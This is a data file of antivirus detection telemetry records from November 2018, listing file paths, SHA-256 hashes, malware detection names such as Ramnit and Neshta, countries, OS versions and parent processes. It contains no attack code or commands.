  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='IT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-04T17:28:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T06:24:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Volumes/Seagate Expansion Drive/Backups.backupdb/iMac/2018-10-28-014525/Macintosh HD/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T11:24:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='US', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B6BC2E7BADAD7999BE98010944862399C03A6BBA27F69A3E394BF53562E649C1', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='b6bc2e7badad7999be98010944862399c03a6bba27f69a3e394bf53562e649c1', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:40:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='E:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Software\\3D\\Zbrush\\Pixologic.ZBrush.4R8.P2.Update.Only\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-04T19:45:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kgftbz_posemod.exe', filepath='c:\\users\\X\\downloads\\play as megami mod by alexgaming\\kgftbz_posemod.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='kgftbz_posemod.exe', filepath='c:\\users\\X\\downloads\\play as megami mod by alexgaming\\kgftbz_posemod.exe', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T16:06:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-121045-3dc9baf8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e88e3502\\AVSCAN-20181104-120819-2B50EA56\\AVSCAN-20181104-121045-3DC9BAF8', filesize=576000, name='HEUR/APC.#M1.#R1'), hash='b7f73bc60f85498239623ee42831c8032e8f89ee0a9f0f2939079c2bbb5b47dc', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:51Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B818EB54B8943B689F375C87C8F54ABBC05390C2CEAAF737F77BE654C732E5F9', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b818eb54b8943b689f375c87c8f54abbc05390c2ceaaf737f77be654c732e5f9', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B81D81CC96BFCFCAADC71383F3141EBD88EB449EB08D4173E94514D4EE30F2A0', filesize=896000, name='TR/Kryptik.cqkbr.#M1.#R1'), hash='b81d81cc96bfcfcaadc71383f3141ebd88eb449eb08d4173e94514d4ee30f2a0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:48:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:12:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:39:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T02:52:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='faq-content.html', filepath='C:\\Program Files\\CSR\\CSR Harmony Wireless Software Stack\\HelpFiles\\de-de\\faq-content.html', filesize=224000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b897283448f7168fb1e2cbeaf6d332fae286ae585158fbfc6f52ce78b2895ed2', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T01:52:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='-__---___---___---__-_-_--___--_-_----_.{288ec649-af78-4771-975c-a33ded88889f}', filepath='\\?\\E:\\\xa0\\-__---___---___---__-_-_--___--_-_----_.{288EC649-AF78-4771-975C-A33DED88889F}', filesize=5532000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='b915a75a26414844da5b060ed4491e735c658e564a53a1562cf31b40ee9d5563', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:59:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='199c47b65c3579cca02d5a3f58ad1e9dadd78e34', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\199c47b65c3579cca02d5a3f58ad1e9dadd78e34', filesize=384000, name='HEUR/AGEN.1029348.#M1.#R1'), hash='b9429a4af10ef11cfcc2ded9274125025bc3931cfe12c5985435f3d35745d242', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:31:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155840-dca91e87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-155449-B8C81DD8\\AVSCAN-20181104-155840-DCA91E87', filesize=332000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b969553818d7b1a9081ec2355798048f5b1410113b76a58febe22f31873c614a', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:13:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='30_asd_02_symbols33.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Macromedia\\Flash MX\\Help\\Flash\\html\\30_asd_02_symbols33.html', filesize=332000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='b969553818d7b1a9081ec2355798048f5b1410113b76a58febe22f31873c614a', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:05:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-112723-f83ed525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_36bb77ec\\AVSCAN-20181104-112657-F48AA8D3\\AVSCAN-20181104-112723-F83ED525', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T08:27:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='116845a2-c2bc-ed08-3b0a-dd876dd17a31.exe', filepath='F:\\{41fbdc74-3d0f-c7bc-352b-3b35d1825a35}\\116845a2-c2bc-ed08-3b0a-dd876dd17a31.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2380944, timestamp='2018-11-04T08:19:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='895df1f1-280f-31ea-67bc-26affa89c703.exe', filepath='d:\\{86f79ba7-16e0-0585-bcbb-111c3d2220e3}\\895df1f1-280f-31ea-67bc-26affa89c703.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='AF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T08:27:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:18:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:34:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:04:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:29:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:55:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:26:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:21:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:12:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:57:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:42:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:10:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='downloader-fuer-chess3_setup.exe', filepath='H:\\Dokumente und Einstellungen\\LocalAdmin\\Eigene Dateien\\Downloads\\Downloader-fuer-chess3_setup.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ba73e11188a5bbe09ed202cdaddaecd29001007fc81326b63e4837a9881a12ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=4848960, timestamp='2018-11-04T17:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-185308-f5915de0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b4cbd8e\\AVSCAN-20181104-185214-EDAFD691\\AVSCAN-20181104-185308-F5915DE0', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ba73e11188a5bbe09ed202cdaddaecd29001007fc81326b63e4837a9881a12ec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:53:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181205-120826-e1105b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c940481c\\AVSCAN-20181205-120802-DDE2DAF0\\AVSCAN-20181205-120826-E1105B67', filesize=64000, name='TR/ATRAPS.Gen.#M300.#R2775'), hash='baafe18271e42a08098929bd76db1a058cbc77015851267fe35a784edebf7532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:18:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pmp_ipod.dll', filepath='F:\\Portable Software collection Vol 1 (run it from Usb flash drive)\\Audio\\PortW5.21_Pro_Full\\Plugins\\pmp_ipod.dll', filesize=64000, name='TR/ATRAPS.Gen.#M300.#R2775'), hash='baafe18271e42a08098929bd76db1a058cbc77015851267fe35a784edebf7532', metadata=Row(cmdline='a -ep1 -r0 -iext -- . \\\\\\"F:\\\\\\\\Portable Software collection Vol 1 (run it from Usb flash drive)\\\\\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=916992, timestamp='2018-11-04T03:20:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=18000000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='badd0938ca813893451a230bac0664eede1f1a558e9999daca8c27ec099fe295', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3231232, timestamp='2018-11-04T16:04:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ig7icd32.dll', filepath='d:\\program\\driver high acer end rri\\vga_intel_9.17.10.2843_w7x64_a\\vga_intel_9.17.10.2843_win7x64\\graphics\\ig7icd32.dll', filesize=8576000, name='W32/Ramnit.C.#M1.#R1'), hash='bb340d1b0a1a16bbc2e72c455b3a137cdde5ece11558f5255042d8b148bbb3bf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:18:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avcenter.exe', filepath='\\?\\J:\\PROGRAMS\\anty virus\\Avira\\AntiVir PersonalEdition Classic\\avcenter.exe', filesize=512000, name='W32/Sality.#M1.#R1'), hash='bb7fb3d38e014bc10920b5470a34bd0701251ef5e1f763d9f192ada0555be4b7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221915-85e1ef3a', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221915-85E1EF3A', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221912-85a1eb44', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221912-85A1EB44', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221911-8569acf7', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AVSCAN-20181104-221544-6D618304\\AVSCAN-20181104-221911-8569ACF7', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='bbe8ce74b8e86087a23f070c9afaf36cb2a187bea7ac8f43a0e0cb9e73aefb41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:19:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='delegate_execute.exe', filepath='C:\\Users\\X\\AppData\\Local\\Maelstrom\\Application\\44.0.1.3\\delegate_execute.exe', filesize=768000, name='W32/Neshta.A.#M1.#R1'), hash='bc2516bca803dd187b4c8831aea92d938a8a3d7122e4f436e42f6ff3f5561c55', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:OTbXg\\\\\\/gmnEWe7BXK.1', country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T06:10:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0dac66f287beb67490479336590f6cc3f95e13e8', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\0dac66f287beb67490479336590f6cc3f95e13e8', filesize=320000, name='Adware/DealPly.bc4be1.#M1.#R1'), hash='bc4be14f575f785c75dd003e76595b5dfecef21de4c54c0851bc45426e3846d6', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:48:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Distillr\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bc58d677ba61f2b2b050ba4434ba1a2921524560e1440df2e3dd1a4ff8176347', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\DesktopLayer专杀.exe', parentsize=258048, timestamp='2018-11-04T13:36:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Distillr\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bc58d677ba61f2b2b050ba4434ba1a2921524560e1440df2e3dd1a4ff8176347', metadata=Row(cmdline='\\\\\\/I {AC76BA86-2052-0000-7760-100000000002}', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T12:37:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='uts_new.exe', filepath='G:\\Users\\X\\Downloads\\Document\\Algo Laporan\\uts_new.exe', filesize=128000, name='W32/Neshta.A.#M1.#R1'), hash='bc94a371dd4d2d98d81e037525a9efe6aa9a593aad62f8924fc3f2066c2b6c41', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:55:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobexmp.dll', filepath='D:\\Program Files\\Adobe\\Acrobat 7.0\\Acrobat\\AdobeXMP.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='bcc6bfb1229f670c8dfd9222478cdfdae1649a19b580b0ce85097826dc8f137d', metadata=Row(cmdline='\\\\\\/I {AC76BA86-2052-0000-7760-100000000002}', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\msiexec.exe', parentsize=73216, timestamp='2018-11-04T12:37:40Z'), dt=datetime.date(2018, 11, 4)),
